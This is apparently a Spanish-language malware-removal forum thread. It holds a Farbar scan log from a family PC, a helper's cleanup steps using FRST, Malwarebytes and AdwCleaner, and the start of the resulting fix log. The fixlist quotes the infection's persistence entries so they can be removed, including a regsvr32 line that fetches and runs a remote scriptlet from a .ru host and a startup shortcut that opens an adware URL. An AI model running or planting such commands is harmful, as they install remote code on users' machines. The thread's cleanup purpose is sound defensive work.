FirewallRules: [TCP Query User{EB69B0BF-CEBA-4A76-A71B-5B54873F6315}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [UDP Query User{F36ED7B7-BE13-4F27-B4D4-7AC9C3F80504}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [{460BBF5E-3754-445B-8505-5CBE6E1021D6}] => (Allow) C:\Program Files\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{E814B573-DA37-49A5-83BD-CE5E05C0DCCC}] => (Allow) C:\Program Files\Elsword\data\x2.exe Ningún archivo
FirewallRules: [TCP Query User{1696113F-1966-4FC3-B829-3B234A7FD8E6}C:\program files\java\jre1.8.0_131\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_131\bin\javaw.exe Ningún archivo
FirewallRules: [UDP Query User{F4F3BE95-61E7-4D15-840E-DCD853946D26}C:\program files\java\jre1.8.0_131\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_131\bin\javaw.exe Ningún archivo
FirewallRules: [TCP Query User{637D3EA8-C90E-4DF9-A58E-D23295AB44E9}C:\kaybo\gunz ultra\gunzrun.exe] => (Allow) C:\kaybo\gunz ultra\gunzrun.exe Ningún archivo
FirewallRules: [UDP Query User{F7CF63A3-269B-4561-86AD-C2662D9EEE05}C:\kaybo\gunz ultra\gunzrun.exe] => (Allow) C:\kaybo\gunz ultra\gunzrun.exe Ningún archivo
FirewallRules: [{E27126AC-A01E-4EA3-B035-9736657180B7}] => (Allow) C:\AeriaGames\Aura Kingdom-ES\game.bin (X-Legend Entertainment CO., LTD. -> X-LEGEND Entertaimment)
FirewallRules: [{7AB9F7C9-0BAF-45D6-9BE3-0CBC5A30A82D}] => (Allow) C:\AeriaGames\Aura Kingdom-ES\game.bin (X-Legend Entertainment CO., LTD. -> X-LEGEND Entertaimment)
FirewallRules: [TCP Query User{A3B1ADA2-95B3-438B-8E54-9E9F940CAB9D}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.129\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.129\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{F5045B09-7686-438C-9E80-762ECB7B8BE7}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.129\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.129\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{AAA550EE-3077-4845-B4D5-7762BB872C3D}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.133\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.133\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{D8F93572-717C-408E-BA54-9BEDE5B0303A}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.133\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.133\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{2A6E4636-3DF1-4590-9201-2899EA3D816A}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.137\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.137\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{AC5587DE-29AA-4F28-87C6-A0375B02A192}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.137\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.137\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{36CA106A-8FE5-4816-A362-11330B441CC0}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.138\deploy\leagueclient.exe] => (Block) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.138\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{84437487-7B69-45DE-968A-0F53DF5EBA95}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.138\deploy\leagueclient.exe] => (Block) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.138\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{9949CAE6-B7DA-4860-A8DC-F2109C62E003}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.139\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.139\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{BEFE0BA9-83CA-467F-A948-E40DF9FF7FF0}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.139\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.139\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{AB50A785-40D0-4058-8C6D-A4759B265D94}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.140\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.140\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{EF6E007E-7365-40BD-A4F2-7886E791BED5}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.140\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.140\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{F842DFF2-F727-437F-8F21-5AF7983A5B8D}C:\users\familia landaeta\documents\hdghdfg\eidos interactive\pyro\commandos\mpserver.exe] => (Allow) C:\users\familia landaeta\documents\hdghdfg\eidos interactive\pyro\commandos\mpserver.exe Ningún archivo
FirewallRules: [UDP Query User{6F5F8AB8-976F-41A2-A350-104515B0CB5B}C:\users\familia landaeta\documents\hdghdfg\eidos interactive\pyro\commandos\mpserver.exe] => (Allow) C:\users\familia landaeta\documents\hdghdfg\eidos interactive\pyro\commandos\mpserver.exe Ningún archivo
FirewallRules: [TCP Query User{25A2BA8A-28C5-4E9B-A6EC-0E14FA44696A}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [UDP Query User{FC10D8A2-84A6-486E-9B44-4D429630E79C}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [TCP Query User{EC824BA9-E1C5-4845-9D9F-CEAAC0D6906D}C:\program files\universegamers\gunzv10.1\uggunz.exe] => (Allow) C:\program files\universegamers\gunzv10.1\uggunz.exe (Universe Gamers) [Archivo no firmado]
FirewallRules: [UDP Query User{FBFA65E9-D662-4EA6-94C8-5B65E28D736F}C:\program files\universegamers\gunzv10.1\uggunz.exe] => (Allow) C:\program files\universegamers\gunzv10.1\uggunz.exe (Universe Gamers) [Archivo no firmado]
FirewallRules: [TCP Query User{531C0145-8767-4816-8BE5-4C6E60C0DC16}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{411A3610-0A5E-4608-BD9C-CC136419CDAC}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{A622F54E-0B36-4531-835B-F26799ACC2F9}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.155\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.155\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{61240510-5F38-4C6A-A5EB-65A65617A4C1}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.155\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.155\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{BB08D777-19BC-4D75-B0A8-F49383F4EBC4}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.156\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.156\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{F1C0A4E3-114D-4026-9732-049EA38E069C}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.156\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.156\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{1CAAE91B-4B4F-413E-BBF0-82CDA598D3DA}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.157\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.157\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{47706439-E403-4C7D-9EDE-D1344A1F233C}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.157\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.157\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{2A5A7E4D-7749-4A93-A1AB-EF237471FA8B}C:\users\familia landaeta\desktop\halo 1 campaña portable\halo 1\halo campaña.exe] => (Allow) C:\users\familia landaeta\desktop\halo 1 campaña portable\halo 1\halo campaña.exe Ningún archivo
FirewallRules: [UDP Query User{EC88AD74-D45F-4E8D-A40B-1C0CC426A16F}C:\users\familia landaeta\desktop\halo 1 campaña portable\halo 1\halo campaña.exe] => (Allow) C:\users\familia landaeta\desktop\halo 1 campaña portable\halo 1\halo campaña.exe Ningún archivo
FirewallRules: [TCP Query User{7F91224D-8E51-4F55-9F4D-B608B29C4924}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.158\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.158\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{EB15D02D-72EA-4DD6-ACFE-4642784E48AA}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.158\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.158\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{B3269DA9-6177-4678-B55E-C9B931C1229C}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [UDP Query User{2FFF9BF0-13C8-42B3-A231-6751376620F7}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [TCP Query User{8745764A-BC83-4F55-9171-A5982B40232C}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.159\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.159\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{989FF411-E4ED-4D70-9E3C-790F16DC0BA3}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.159\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.159\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{04C22F37-9603-465F-815E-37F38486F1DA}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.160\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.160\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{B89B45E2-2A53-4ED7-B129-917471B6306E}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.160\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.160\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{B1524B90-B864-4AFD-B78E-E5F599B537E8}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.161\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.161\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{E13FD752-7E41-4C11-9987-4358AE0CEC63}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.161\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.161\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{8F976A90-C687-4FD6-9141-889CAD57FB2D}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.162\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.162\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{03F47DD5-648D-4556-909F-25D7EE7A7C37}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.162\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.162\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{E53A12F1-9811-40B3-9BA4-93F39D80DB23}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.163\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.163\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{3C8F5781-51E6-489A-9E90-2D88477F13BD}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.163\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.163\deploy\leagueclient.exe Ningún archivo
FirewallRules: [{EAE3E187-9D04-49F4-A4B0-853596BFBFA5}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{AFEA90B5-FA67-43D1-8509-81A6255DD64C}] => (Allow) C:\Program Files\BlueStacks\HD-Player.exe Ningún archivo
FirewallRules: [{2C916BF5-DB28-4C44-8AFD-D827448F82BB}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{7DE87355-A05F-410A-8AAE-AD72211BAAE8}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{1F09387B-EAC1-494C-9728-5D3C7724F953}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{DC393E86-4829-46F1-B277-E2E6F1B3B57D}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
==================== Puntos de Restauración =========================
20-04-2020 14:28:31 Punto de control programado
21-04-2020 10:15:13 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212
21-04-2020 10:16:09 Installed Intel® Processor Identification Utility
==================== Dispositivos defectuosos en el Administrador de dispositivos ============
Name: Security Processor Loader Driver
Description: Security Processor Loader Driver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: spldr
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
==================== Errores del registro de eventos: ========================
Errores de aplicación:
==================
Error: (04/22/2020 11:47:48 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.
Error: (04/22/2020 11:42:57 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.
Error: (04/22/2020 11:41:13 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Error de activación de la licencia de Windows. Error 0x00000000.
Error: (04/22/2020 11:41:12 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Error de la activación de licencia (slui.exe) con el siguiente código:
0x800401F9
Error: (04/22/2020 11:40:06 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.
Error: (04/22/2020 11:38:25 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Error de activación de la licencia de Windows. Error 0x00000000.
Error: (04/22/2020 11:38:25 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Error de la activación de licencia (slui.exe) con el siguiente código:
0x800401F9
Error: (04/22/2020 11:26:57 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: No se pudo reactivar el filtro de eventos con la consulta "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" en el espacio de nombres "//./root/CIMV2" por el error 0x80041003. Los eventos no se podrán entregar a través de este filtro hasta que se corrija este problema.
Errores del sistema:
=============
Error: (04/22/2020 11:47:46 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: Error de DCOM "1084" al intentar iniciar el servicio VSS con argumentos "" para ejecutar el servidor:
{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}
Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error:
No se puede iniciar el servicio o grupo de dependencia.
Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error:
No se puede iniciar el servicio o grupo de dependencia.
Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error:
No se puede iniciar el servicio o grupo de dependencia.
Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error:
No se puede iniciar el servicio o grupo de dependencia.
Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error:
No se puede iniciar el servicio o grupo de dependencia.
Error: (04/22/2020 11:46:19 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Servicio de lista de redes depende del servicio Reconocimiento de ubicación de red, el cual no pudo iniciarse debido al siguiente error:
No se puede iniciar el servicio o grupo de dependencia.
Error: (04/22/2020 11:46:19 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: Error de DCOM "1084" al intentar iniciar el servicio WSearch con argumentos "" para ejecutar el servidor:
{9E175B6D-F52A-11D8-B9A5-505054503030}
Windows Defender:
===================================
Date: 2020-04-16 10:04:25.437
Description:
El examen de Windows Defender se detuvo antes de completarse.
Id. de examen:{D89403F0-B93D-475E-9BE2-D2E52245BCDF}
Tipo de examen:AntiSpyware
Parámetros de examen:Examen rápido
Usuario:FamiliaLandaeta\Familia Landaeta
==================== Información de la memoria ===========================
BIOS: American Megatrends Inc. 6.07 03/21/2011
Placa base: FOXCONN 2A8C
Procesador: Pentium(R) Dual-Core CPU E5800 @ 3.20GHz
Porcentaje de memoria en uso: 72%
RAM física total: 2013.24 MB
RAM física disponible: 554.35 MB
Virtual total: 4026.48 MB
Virtual disponible: 2630.89 MB
==================== Unidades ================================
Drive c: () (Fixed) (Total:148.95 GB) (Free:44.16 GB) NTFS
\\?\Volume{459fd2d9-792a-11e6-a962-806e6f6e6963}\ (Reservado para el sistema) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
==================== MBR & Tabla de particiones ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 149.1 GB) (Disk ID: F362F362)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=149 GB) - (Type=07 NTFS)
==================== Final Addition.txt =======================Lo primero dale a desinstalar Ccleaner
Bien… y ahora sigue estos pasos, MUY Importante ~ Realiza una copia de seguridad del registro :
-
Para hacerlo descarga Delfix en tu escritorio.
-
Doble clic para ejecutarlo.(Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona "Ejecutar como Administrador.")
-
Atención, ahora marca/selecciona únicamente las casillas Registry Backup, las demás NO
-
Pulsar en Run.
Se abrirá el informe (Delfix.txt), guárdalo por si fuera necesario y cierra la herramienta.
En el equipo con los demas programas cerrados:
Inicio >>> Ejecutar >>>Escribes notepad.exe.
Ahora copia y pega estos archivos dentro del Notepad:
Start
CreateRestorePoint:
CloseProcesses:
ShortcutAndArgument: user.lnk -> C:\Windows\System32\cmd.exe => /c explorer hxxp://www2.savemax.store/
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\MountPoints2: {3ce42c48-38d5-11e8-849d-78acc0bd591b} - E:\Setup.exe
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.39slxu3bw.ru/restore.xml scrobj.dll <==== ATENCIÓN
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xiwlwq.lnk [2020-04-22]
ShortcutTarget: xiwlwq.lnk -> C:\Users\Familia Landaeta\AppData\Local\aoxfre\obbtgsrn.exe (Microsoft Windows -> Microsoft Corporation)
Task: {AB5506EA-16C8-46C4-9F8E-4B7ED9BA87EA} - System32\Tasks\{568A21DE-A13A-462D-94F2-3A85694880BF} => C:\Windows\system32\pcalua.exe -a C:\Users\FAMILI~1\AppData\Local\Temp\jre-8u161-windows-au.exe -d C:\Windows\system32 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATENCIÓN
Task: C:\Windows\Tasks\CCleaner Update.job => C:\Program Files\CCleaner\CCUpdate.exe
C:\Program Files\CCleaner
Toolbar: HKU\S-1-5-21-1692793609-910991690-2205039242-1000 -> Sin Nombre - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Ningún archivo
S3 fiddrv; no ImagePath
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 XDva511; \??\C:\Windows\system32\XDva511.sys [X]
2016-12-15 03:13 - 2016-12-15 03:14 - 000000000 _____ () C:\Users\Familia Landaeta\AppData\Local\{42A7229B-167F-4CEB-928F-88DF4E1A435E}
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
ShortcutWithArgument: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /c explorer hxxp://www2.savemax.store/
HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END
Lo guardas bajo el nombre de fixlist.txt en el escritorio <<< Esto es muy importante.<<
Nota: Es importante que la Hta Frst.exe y fixlist.txt se encuentren en la misma ubicación (escritorio) o si no no trabajara.
-
Y ahora INICIA EN MODO SEGURO DE WINDOWS
-
Ejecutas Frst.exe.
-
Presionas el botón Corregir y aguardas a que termine.
-
La Herramienta guardara el reporte en tu escritorio (Fixlog.txt).
Lo pegas en tu próxima respuesta, y ademas realizas
1) Descarga, instala y ejecuta Malwarebytes’ Anti-Malware.
-
Presiona clic en “Use Malewarebytes Free” (Usar Malewarebyte gratis).
-
Pulsa en el botón “Open Malewarebytes Free”.
- Presiona el botón “Scan” (Escaneo).
Una vez finalizado el escaneo aparecerá la siguiente pantalla:
-
Pulsa en “View report” (Ver informe).
-
Luego presionar el botón “Export” (Exportar). Elijes “Text file” (fichero de texto). Elijes un nombre y guardas ese archivo en el escritorio…
2) Descarga Adwcleaner en el escritorio.
-
Desactiva tu antivirus
Como deshabilitar temporalmente un antivirus y cualquier programa de seguridad. -
Ejecuta Adwcleaner.exe (Si usas Windows Vista/7 u 8 presiona clic derecho y selecciona "Ejecutar como Administrador.")
-
Pulsar en el botón Analizar Ahora, y espera a que se realice el proceso, inmediatamente pulsa sobre el botón Iniciar Reparacion.
-
Espera a que se complete y sigue las instrucciones, si te pidiera Reiniciar el sistema Aceptas.
-
Si no encuentra nada, pulsamos “Omitir Reparación”
-
El log lo encontramos en la pestaña “Informes”, volviendo a abrir el programa, si es necesario o en"C:\AdwCleaner\Logs\AdwCleaner[C0].txt"
Puedes mirar su manual >> Manual de Adwcleaner.
Resultados de la corrección de Farbar Recovery Scan Tool (x86) Versión: 19-04-2020
Ejecutado por Familia Landaeta (25-04-2020 08:16:14) Run:1
Ejecutado desde C:\Users\Familia Landaeta\Desktop
Perfiles cargados: Familia Landaeta (Perfiles disponibles: Familia Landaeta)
Modo de Inicio: Safe Mode (minimal)
==============================================
fixlist contenido:
*****************
Start
CreateRestorePoint:
CloseProcesses:
ShortcutAndArgument: user.lnk -> C:\Windows\System32\cmd.exe => /c explorer hxxp://www2.savemax.store/
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\MountPoints2: {3ce42c48-38d5-11e8-849d-78acc0bd591b} - E:\Setup.exe
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.39slxu3bw.ru/restore.xml scrobj.dll <==== ATENCI�N
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xiwlwq.lnk [2020-04-22]
ShortcutTarget: xiwlwq.lnk -> C:\Users\Familia Landaeta\AppData\Local\aoxfre\obbtgsrn.exe (Microsoft Windows -> Microsoft Corporation)
Task: {AB5506EA-16C8-46C4-9F8E-4B7ED9BA87EA} - System32\Tasks\{568A21DE-A13A-462D-94F2-3A85694880BF} => C:\Windows\system32\pcalua.exe -a C:\Users\FAMILI~1\AppData\Local\Temp\jre-8u161-windows-au.exe -d C:\Windows\system32 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATENCI�N
Task: C:\Windows\Tasks\CCleaner Update.job => C:\Program Files\CCleaner\CCUpdate.exe
C:\Program Files\CCleaner
Toolbar: HKU\S-1-5-21-1692793609-910991690-2205039242-1000 -> Sin Nombre - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Ning�n archivo
S3 fiddrv; no ImagePath
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 XDva511; \??\C:\Windows\system32\XDva511.sys [X]
2016-12-15 03:13 - 2016-12-15 03:14 - 000000000 _____ () C:\Users\Familia Landaeta\AppData\Local\{42A7229B-167F-4CEB-928F-88DF4E1A435E}
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
ShortcutWithArgument: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /c explorer hxxp://www2.savemax.store/
HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END
*****************
Error: El punto de restauración solamente puede ser creado en modo normal.
Procesos cerrados correctamente.
ShortcutAndArgument: user.lnk -> C:\Windows\System32\cmd.exe => /c explorer hxxp://www2.savemax.store/ => Error: Ninguna corrección automática encontrada para esta entrada.
